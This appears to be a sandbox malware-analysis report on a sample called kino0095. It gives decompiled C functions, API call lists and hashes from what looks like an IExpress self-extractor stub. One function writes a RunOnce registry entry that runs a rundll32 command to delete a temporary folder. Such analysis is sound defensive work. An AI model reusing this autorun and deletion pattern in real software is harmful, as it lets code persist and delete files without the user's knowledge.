0x010b2d3b 0x010b2d40 0x010b2d48 0x010b2d59 0x010b2d84 0x010b2e1f 0x010b2e1f 0x010b2e2e
0x010b2e41 0x010b2e5a 0x010b2e62 0x010b2e6c 0x010b2e6c 0x010b2e75 0x010b2e77 0x010b2e77
0x010b2e84 0x010b2e8b 0x010b2e94 0x00000000 0x010b2e96 0x010b2e96 0x010b2e9e 0x010b2ea2
0x010b2eba 0x00000000 0x010b2ece 0x010b2ede 0x010b2eed 0x00000000 0x00000000 0x00000000
0x00000000 0x010b2eed 0x010b2eef 0x010b2eef 0x010b2eef 0x010b2eef 0x010b2ea2 0x010b2e86
0x010b2e88 0x010b2e88 0x010b2e43 0x010b2e48 0x00000000 0x010b2e48 0x010b2e30 0x010b2e30
0x010b2ef8 0x010b2f01 0x00000000 0x010b2f01 0x010b2d8a 0x010b2d8f 0x010b2da1 0x00000000
0x010b2da3 0x010b2dae 0x010b2db4 0x010b2dbb 0x00000000 0x010b2dca 0x010b2dd3 0x010b2df5
0x010b2e02 0x00000000 0x00000000 0x00000000 0x00000000 0x010b2dd5 0x010b2dde 0x010b2de3
0x010b2e04 0x010b2e0a 0x010b2e10 0x00000000 0x010b2e10 0x010b2dd3 0x010b2dbb 0x010b2da1
0x010b2d5b 0x010b2d5b 0x010b2d5d 0x010b2d69 0x010b2d6e 0x010b2f06 0x010b2f06 0x010b2f06
0x010b2d59 0x010b2f18

APIs
• memset.MSVCRT ref: 010B2CD9
• memset.MSVCRT ref: 010B2CE9
• memset.MSVCRT ref: 010B2CF9
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
  • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
  • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
  • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
  • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
  • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B2D34
• SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010B2D40
• CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010B2DAE
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010B2DBD
• CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010B2E0A
  • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
  • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
• String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
• API String ID: 1002816675-859929227
• Opcode ID: 493b7aac79ae8acf712a83d6dc6c589515ddce87efd101e4225a4b49f058a1d7
• Instruction ID: 89f42b601aaa5b560a9d11d7c55a93b0137055ebb010269a6f91f4fb8a037ff0
• Opcode Fuzzy Hash: 493b7aac79ae8acf712a83d6dc6c589515ddce87efd101e4225a4b49f058a1d7
• Instruction Fuzzy Hash: 2F510AB0300301AAF7B06B299CC9BFB36DCEB55704F004469F6D2DA1D9DBB9A841C725
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 81%
E010B34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
	void* _t9;
	void* _t12;
	void* _t13;
	void* _t17;
	void* _t23;
	void* _t25;
	struct HWND__* _t35;
	struct HWND__* _t38;
	void* _t39;

	_t9 = _a8 - 0x10;
	if(_t9 == 0) {
		__eflags = 1;
		L19:
		_push(0);
		 *0x10b91d8 = 1;
		L20:
		_push(_a4);
		L21:
		EndDialog();
		L22:
		return 1;
	}
	_push(1);
	_pop(1);
	_t12 = _t9 - 0xf2;
	if(_t12 == 0) {
		__eflags = _a12 - 0x1b;
		if(_a12 != 0x1b) {
			goto L22;
		}
		goto L19;
	}
	_t13 = _t12 - 0xe;
	if(_t13 == 0) {
		_t35 = _a4;
		 *0x10b8584 = _t35;
		E010B43D0(_t35, GetDesktopWindow());
		__eflags =  *0x10b8184; // 0x1
		if(__eflags != 0) {
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
		}
		SetWindowTextA(_t35, "doza2");
		_t17 = CreateThread(0, 0, E010B4FE0, 0, 0, 0x10b8798);
		 *0x10b879c = _t17;
		__eflags = _t17;
		if(_t17 != 0) {
			goto L22;
		} else {
			E010B44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
			_push(0);
			_push(_t35);
			goto L21;
		}
	}
	_t23 = _t13 - 1;
	if(_t23 == 0) {
		__eflags = _a12 - 2;
		if(_a12 != 2) {
			goto L22;
		}
		ResetEvent( *0x10b858c);
		_t38 =  *0x10b8584; // 0x0
		_t25 = E010B44B9(_t38, 0x4b2, 0x10b1140, 0, 0x20, 4);
		__eflags = _t25 - 6;
		if(_t25 == 6) {
			L11:
			 *0x10b91d8 = 1;
			SetEvent( *0x10b858c);
			_t39 =  *0x10b879c; // 0x0
			E010B3680(_t39);
			_push(0);
			goto L20;
		}
		__eflags = _t25 - 1;
		if(_t25 == 1) {
			goto L11;
		}
		SetEvent( *0x10b858c);
		goto L22;
	}
                                                                                                                                                                                                                                    				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                    					TerminateThread( *0x10b879c, 0);
                                                                                                                                                                                                                                    					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 010B3535
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 010B3541
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 010B355F
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(010B1140,00000000,00000020,00000004), ref: 010B3590
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 010B35C7
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 010B35F1
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 010B35F8
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 010B3610
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 010B3617
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 010B3623
                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 010B3637
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 010B3671
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 2406144884-612509477
• Opcode ID: 7340ef4516c62ecd4c3528ed963400e779319a1bfd81adf8767689809764f868
• Instruction ID: ad24352d89e94231d48ad774b0b29eb63ee8ffc410b571d1a6e05164d76114d0
• Opcode Fuzzy Hash: 7340ef4516c62ecd4c3528ed963400e779319a1bfd81adf8767689809764f868
• Instruction Fuzzy Hash: 83318A75240301FBD7701F29ACCDEEA3E68F789B45F14891AF7C29A299CB7A8410CB54
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 50%
E010B4224(char __ecx) {
	char* _v8;
	_Unknown_base(*)()* _v12;
	_Unknown_base(*)()* _v16;
	_Unknown_base(*)()* _v20;
	char* _v28;
	intOrPtr _v32;
	intOrPtr _v36;
	intOrPtr _v40;
	char _v44;
	char _v48;
	char _v52;
	_Unknown_base(*)()* _t26;
	_Unknown_base(*)()* _t28;
	_Unknown_base(*)()* _t29;
	_Unknown_base(*)()* _t32;
	char _t42;
	char* _t44;
	char* _t61;
	void* _t63;
	char* _t65;
	struct HINSTANCE__* _t66;
	char _t67;
	void* _t71;
	char _t76;
	intOrPtr _t85;

	_t67 = __ecx;
	_t66 = LoadLibraryA("SHELL32.DLL");
	if(_t66 == 0) {
		_t63 = 0x4c2;
		L22:
		E010B44B9(_t67, _t63, 0, 0, 0x10, 0);
		return 0;
	}
	_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
	_v12 = _t26;
	if(_t26 == 0) {
		L20:
		FreeLibrary(_t66);
		_t63 = 0x4c1;
		goto L22;
	}
	_t28 = GetProcAddress(_t66, 0xc3);
	_v20 = _t28;
	if(_t28 == 0) {
		goto L20;
	}
	_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
	_v16 = _t29;
	if(_t29 == 0) {
		goto L20;
	}
	_t76 =  *0x10b88c0; // 0x0
	if(_t76 != 0) {
		L10:
		 *0x10b87a0 = 0;
		_v52 = _t67;
		_v48 = 0;
		_v44 = 0;
		_v40 = 0x10b8598;
		_v36 = 1;
		_v32 = E010B4200;
		_v28 = 0x10b88c0;
		 *0x10ba288( &_v52);
		_t32 =  *_v12();
		if(_t71 != _t71) {
			asm("int 0x29");
		}
		_v12 = _t32;
		if(_t32 != 0) {
			 *0x10ba288(_t32, 0x10b88c0);
			 *_v16();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
			if( *0x10b88c0 != 0) {
				E010B1680(0x10b87a0, 0x104, 0x10b88c0);
			}
			 *0x10ba288(_v12);
			 *_v20();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
		}
		FreeLibrary(_t66);
		_t85 =  *0x10b87a0; // 0x0
		return 0 | _t85 != 0x00000000;
	} else {
		GetTempPathA(0x104, 0x10b88c0);
		_t61 = 0x10b88c0;
		_t4 =  &(_t61[1]); // 0x10b88c1
		_t65 = _t4;
		do {
			_t42 =  *_t61;
			_t61 =  &(_t61[1]);
		} while (_t42 != 0);
		_t5 = _t61 - _t65 + 0x10b88c0; // 0x2171181
		_t44 = CharPrevA(0x10b88c0, _t5);
		_v8 = _t44;
		if( *_t44 == 0x5c &&  *(CharPrevA(0x10b88c0, _t44)) != 0x3a) {
			 *_v8 = 0;
		}
		goto L10;
	}
}
0x010b4234
0x010b423c
0x010b4240
0x010b43b2
0x010b43b7
0x010b43c0
0x00000000
0x010b43c5
0x010b424c
0x010b4252
0x010b4257
0x010b43a4
0x010b43a5
0x010b43ab
0x00000000
0x010b43ab
0x010b4263
0x010b4269
0x010b426e
0x00000000
0x00000000
0x010b427a
0x010b4280
0x010b4285
0x00000000
0x00000000
0x010b428d
0x010b4293
0x010b42e6
0x010b42e9
0x010b42ef
0x010b42f4
0x010b42f7
0x010b4300
                                                                                                                                                                                                                                    0x010b4307
                                                                                                                                                                                                                                    0x010b430e
                                                                                                                                                                                                                                    0x010b4315
                                                                                                                                                                                                                                    0x010b431c
                                                                                                                                                                                                                                    0x010b4322
                                                                                                                                                                                                                                    0x010b4326
                                                                                                                                                                                                                                    0x010b432d
                                                                                                                                                                                                                                    0x010b432d
                                                                                                                                                                                                                                    0x010b432f
                                                                                                                                                                                                                                    0x010b4334
                                                                                                                                                                                                                                    0x010b4343
                                                                                                                                                                                                                                    0x010b4349
                                                                                                                                                                                                                                    0x010b434d
                                                                                                                                                                                                                                    0x010b4354
                                                                                                                                                                                                                                    0x010b4354
                                                                                                                                                                                                                                    0x010b435d
                                                                                                                                                                                                                                    0x010b436e
                                                                                                                                                                                                                                    0x010b436e
                                                                                                                                                                                                                                    0x010b437d
                                                                                                                                                                                                                                    0x010b4383
                                                                                                                                                                                                                                    0x010b4387
                                                                                                                                                                                                                                    0x010b438e
                                                                                                                                                                                                                                    0x010b438e
                                                                                                                                                                                                                                    0x010b4387
                                                                                                                                                                                                                                    0x010b4391
                                                                                                                                                                                                                                    0x010b4399
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4295
                                                                                                                                                                                                                                    0x010b429f
                                                                                                                                                                                                                                    0x010b42a5
                                                                                                                                                                                                                                    0x010b42aa
                                                                                                                                                                                                                                    0x010b42aa
                                                                                                                                                                                                                                    0x010b42ad
                                                                                                                                                                                                                                    0x010b42ad
                                                                                                                                                                                                                                    0x010b42af
                                                                                                                                                                                                                                    0x010b42b0
                                                                                                                                                                                                                                    0x010b42b6
                                                                                                                                                                                                                                    0x010b42c2
                                                                                                                                                                                                                                    0x010b42c8
                                                                                                                                                                                                                                    0x010b42ce
                                                                                                                                                                                                                                    0x010b42e4
                                                                                                                                                                                                                                    0x010b42e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b42ce

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010B4236
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010B424C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,000000C3), ref: 010B4263
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010B427A
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,010B88C0,?,00000001), ref: 010B429F
                                                                                                                                                                                                                                    • CharPrevA.USER32(010B88C0,02171181,?,00000001), ref: 010B42C2
                                                                                                                                                                                                                                    • CharPrevA.USER32(010B88C0,00000000,?,00000001), ref: 010B42D6
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010B4391
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010B43A5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                    • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                    • Opcode ID: f0c92a92c1042539099fcfc2f40d1f6eaf7bfab59a0edefaeb3533ad1af1f227
                                                                                                                                                                                                                                    • Instruction ID: a8dffaf84d90c3f1fedd66240e1e9760dd38a050ccab6d4dbb382a716bd7b994
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0c92a92c1042539099fcfc2f40d1f6eaf7bfab59a0edefaeb3533ad1af1f227
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27412B74A01204EFE7619F78E8D49EE7FB8EF44744F08859AE9C2E7256C7798901CB60
                                                                                                                                                                                                                                    Uniqueness
                                                                                                                                                                                                                                    • Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E010B2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				char _v269;
                                                                                                                                                                                                                                    				CHAR* _v276;
                                                                                                                                                                                                                                    				int _v280;
                                                                                                                                                                                                                                    				void* _v284;
                                                                                                                                                                                                                                    				int _v288;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                                                    				int* _t50;
                                                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                                                    				CHAR* _t61;
                                                                                                                                                                                                                                    				char* _t62;
                                                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t52 = __ecx;
                                                                                                                                                                                                                                    				_t23 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                    				_t62 = _a4;
                                                                                                                                                                                                                                    				_t50 = 0;
                                                                                                                                                                                                                                    				_t61 = __ecx;
                                                                                                                                                                                                                                    				_v276 = _t62;
                                                                                                                                                                                                                                    				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                    				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t64 = _t62 + 1;
		_v269 = CharUpperA( *_t64);
		_v276 = CharNextA(CharNextA(_t64));
		_t63 = 0x104;
		_t34 = _v269;
		if(_t34 == 0x53) {
			L14:
			GetSystemDirectoryA(_t61, _t63);
			goto L15;
		} else {
			if(_t34 == 0x57) {
				GetWindowsDirectoryA(_t61, 0x104);
				goto L16;
			} else {
				_push(_t52);
				_v288 = 0x104;
				E010B1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
				_t59 = 0x104;
				E010B658A( &_v268, 0x104, _v276);
				if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
					L16:
					_t59 = _t63;
					E010B658A(_t61, _t63, _v276);
				} else {
					if(RegQueryValueExA(_v284, 0x10b1140, 0,  &_v280, _t61,  &_v288) == 0) {
						_t45 = _v280;
						if(_t45 != 2) {
							L9:
							if(_t45 == 1) {
								goto L10;
							}
						} else {
							if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
								_t45 = _v280;
								goto L9;
							} else {
								_t59 = 0x104;
								E010B1680(_t61, 0x104,  &_v268);
								L10:
								_t50 = 1;
							}
						}
					}
					RegCloseKey(_v284);
					L15:
					if(_t50 == 0) {
						goto L16;
					}
				}
			}
		}
	}
	return E010B6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
}

APIs
• CharUpperA.USER32(72151D89,00000000,00000000,00000000), ref: 010B27A8
• CharNextA.USER32(0000054D), ref: 010B27B5
• CharNextA.USER32(00000000), ref: 010B27BC
• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2829
• RegQueryValueExA.ADVAPI32(?,010B1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2852
• ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2870
• RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B28A0
• GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010B28AA
• GetSystemDirectoryA.KERNEL32 ref: 010B28B9
Strings
• Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010B27E4
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
• Opcode ID: 4bf8074129e9eb9d7354c2bf62bcc99ad5be33e8162a13c1fa58342f61d43b97
                                                                                                                                                                                                                                    • Instruction ID: c1048eb5ec48c636131ddffa676db567874802c0f4486ca78b616658ea790714
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bf8074129e9eb9d7354c2bf62bcc99ad5be33e8162a13c1fa58342f61d43b97
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E741BF70A0012CABDB659B689CC4AFA7BBCEB15700F0040E9F5C9E3104CB759E828FA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 62%
E010B2267() {
	signed int _v8;
	char _v268;
	char _v836;
	void* _v840;
	int _v844;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t19;
	intOrPtr _t33;
	void* _t38;
	intOrPtr* _t42;
	void* _t45;
	void* _t47;
	void* _t49;
	signed int _t51;

	_t19 =  *0x10b8004; // 0x72151d89
	_t20 = _t19 ^ _t51;
	_v8 = _t19 ^ _t51;
	if( *0x10b8530 != 0) {
		_push(_t49);
		if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
			_push(_t38);
			_v844 = 0x238;
			if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
				_push(_t47);
				memset( &_v268, 0, 0x104);
				if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
					E010B658A( &_v268, 0x104, 0x10b1140);
				}
				_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
				E010B171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
				_t42 =  &_v836;
				_t45 = _t42 + 1;
				_pop(_t47);
				do {
					_t33 =  *_t42;
					_t42 = _t42 + 1;
				} while (_t33 != 0);
				RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
			}
			_t20 = RegCloseKey(_v840);
			_pop(_t38);
		}
		_pop(_t49);
	}
	return E010B6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010B22A3
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 010B22D8
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 010B22F5
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 010B2305
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010B236E
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 010B237A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010B2299
                                                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010B232D
                                                                                                                                                                                                                                    • wextract_cleanup1, xrefs: 010B227C, 010B22CD, 010B2363
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010B2321
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Value$CloseDirectoryOpenQuerySystemmemset
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
• API String ID: 3027380567-2048191181
• Opcode ID: 3e422a0a8352bf7b7446b13086d38244ffb81a9f17cd62b28111efca8d996c32
• Instruction ID: 8092eb77b3ad07927f1ef593f32c97fcba98d9b2277ca6feddf2e4f21aea81dc
• Opcode Fuzzy Hash: 3e422a0a8352bf7b7446b13086d38244ffb81a9f17cd62b28111efca8d996c32
• Instruction Fuzzy Hash: 8931A771A00218ABDB719B55DCC9FEA7BBCEF54740F0441EAB58DAB010EA75AB84CB50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
E010B3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
	void* _t8;
	void* _t11;
	void* _t15;
	struct HWND__* _t16;
	struct HWND__* _t33;
	struct HWND__* _t34;

	_t8 = _a8 - 0xf;
	if(_t8 == 0) {
		if( *0x10b8590 == 0) {
			SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
			 *0x10b8590 = 1;
		}
		L13:
		return 0;
	}
	_t11 = _t8 - 1;
	if(_t11 == 0) {
		L7:
		_push(0);
		L8:
		EndDialog(_a4, ??);
		L9:
		return 1;
	}
	_t15 = _t11 - 0x100;
	if(_t15 == 0) {
		_t16 = GetDesktopWindow();
		_t33 = _a4;
		E010B43D0(_t33, _t16);
		SetDlgItemTextA(_t33, 0x834,  *0x10b8d4c);
		SetWindowTextA(_t33, "doza2");
		SetForegroundWindow(_t33);
		_t34 = GetDlgItem(_t33, 0x834);
		 *0x10b88b8 = GetWindowLongA(_t34, 0xfffffffc);
		SetWindowLongA(_t34, 0xfffffffc, E010B30C0);
		return 1;
	}
	if(_t15 != 1) {
		goto L13;
	}
	if(_a12 != 6) {
		if(_a12 != 7) {
			goto L9;
		}
		goto L7;
	}
	_push(1);
	goto L8;
}
APIs
• EndDialog.USER32(?,00000000), ref: 010B313B
• GetDesktopWindow.USER32 ref: 010B314B
• SetDlgItemTextA.USER32(?,00000834), ref: 010B316A
• SetWindowTextA.USER32(?,doza2), ref: 010B3176
• SetForegroundWindow.USER32(?), ref: 010B317D
• GetDlgItem.USER32(?,00000834), ref: 010B3185
• GetWindowLongA.USER32(00000000,000000FC), ref: 010B3190
• SetWindowLongA.USER32(00000000,000000FC,010B30C0), ref: 010B31A3
• SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010B31CA
Strings
Memory Dump Source
